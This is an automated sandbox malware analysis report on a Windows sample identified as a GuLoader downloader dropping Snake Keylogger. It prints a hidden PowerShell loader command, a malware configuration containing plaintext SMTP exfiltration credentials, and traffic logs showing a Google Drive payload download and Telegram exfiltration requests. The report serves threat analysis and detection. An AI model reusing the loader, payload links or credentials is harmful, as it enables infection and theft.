
Windows Analysis Report
Sprawl.exe

Overview

General Information

Sample name: Sprawl.exe
Analysis ID: 1539387
MD5: 47fd98348b7d314e4e9dae46e5f1e1a1
SHA1: cafe48404707e61235bfbe6646d8072af4298e21
SHA256: 125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1
Tags: exevipkeyloggeruser-malwarelabnet

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Sprawl.exe (PID: 2836 cmdline: "C:\Users\user\Desktop\Sprawl.exe" MD5: 47FD98348B7D314E4E9DAE46E5F1E1A1)
    • powershell.exe (PID: 2524 cmdline: "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 4460 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • powershell.exe (PID: 3796 cmdline: "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 3212 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "transjcama@comercialkmag.com", "Password": "pW@4G()=#2", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000004.00000002.2855794933.000000000B95D000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000002.00000002.2786477517.000000000B78B000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000008.00000002.3358316175.0000000005B30000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

            System Summary

Source: Network Connection | Author: frack113 | Data: DestinationIp: 142.250.184.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3212, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49986
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2524, TargetFilename: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Agog\Smriti\Sprawl.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 213.165.67.102, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 4460, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 50027
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)", CommandLine: "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Sprawl.exe", ParentImage: C:\Users\user\Desktop\Sprawl.exe, ParentProcessId: 2836, ParentProcessName: Sprawl.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)", ProcessId: 2524, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-22T16:12:05.444916+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49993 | 188.114.97.3 | 443 | TCP
2024-10-22T16:12:06.804302+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49996 | 188.114.97.3 | 443 | TCP
2024-10-22T16:12:17.408699+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 50021 | 188.114.97.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-22T16:12:01.180935+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49990 | 193.122.6.168 | 80 | TCP
2024-10-22T16:12:04.537983+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49991 | 193.122.6.168 | 80 | TCP
2024-10-22T16:12:04.725700+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49990 | 193.122.6.168 | 80 | TCP
2024-10-22T16:12:06.084842+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49991 | 193.122.6.168 | 80 | TCP
2024-10-22T16:12:06.475477+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49995 | 193.122.6.168 | 80 | TCP
2024-10-22T16:12:07.709864+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49998 | 193.122.6.168 | 80 | TCP
2024-10-22T16:12:08.100608+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49999 | 193.122.6.168 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-22T16:11:53.877008+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49987 | 142.250.184.238 | 443 | TCP
2024-10-22T16:11:53.895201+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49986 | 142.250.184.238 | 443 | TCP


            AV Detection

Source: 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "transjcama@comercialkmag.com", "Password": "pW@4G()=#2", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Source: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Agog\Smriti\Sprawl.exe | ReversingLabs: Detection: 42%
Source: Sprawl.exe | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability

            Location Tracking

            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Sprawl.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49992 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 192.168.2.6:49992 -> 188.114.97.3:443 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49994 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:49987 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:49986 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49988 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49989 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:50023 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:50025 version: TLS 1.2
            Source: Sprawl.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: e.pdb source: powershell.exe, 00000002.00000002.2754688897.0000000007553000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: qm.Core.pdb source: powershell.exe, 00000004.00000002.2832741780.0000000008951000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.2754688897.0000000007553000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Sprawl.exeCode function: 0_2_00406033 FindFirstFileA,FindClose,0_2_00406033
            Source: C:\Users\user\Desktop\Sprawl.exeCode function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055D1
            Source: C:\Users\user\Desktop\Sprawl.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21CEF45Dh8_2_21CEF2C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21CEF45Dh8_2_21CEF4AC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21CEFC19h8_2_21CEF974
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0323F45Dh9_2_0323F2C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0323F45Dh9_2_0323F4AC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0323FC19h9_2_0323F961
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256A31E0h9_2_256A2DC8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256ACF49h9_2_256ACCA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256A2C19h9_2_256A2968
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256AD7F9h9_2_256AD550
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256A31E0h9_2_256A2DB8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256AF209h9_2_256AEF60
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_256A0673
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256AE0A9h9_2_256ADE00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256AE959h9_2_256AE6B0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256A31E0h9_2_256A310E
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256ADC51h9_2_256AD9A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_256A0040
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_256A0853
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256AFAB9h9_2_256AF810
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256AD3A1h9_2_256AD0F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256A0D0Dh9_2_256A0B30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256A1697h9_2_256A0B30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256AEDB1h9_2_256AEB08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256AF661h9_2_256AF3B8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256AE501h9_2_256AE258

            Networking

            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficTCP traffic: 192.168.2.6:50027 -> 213.165.67.102:587
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2023/10/2024%20/%2001:23:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2023/10/2024%20/%2001:23:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 213.165.67.102 213.165.67.102
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
            Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49998 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49990 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49995 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49999 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49991 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49986 -> 142.250.184.238:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49987 -> 142.250.184.238:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50021 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49996 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49993 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.6:50027 -> 213.165.67.102:587
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49992 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 192.168.2.6:49992 -> 188.114.97.3:443 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49994 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
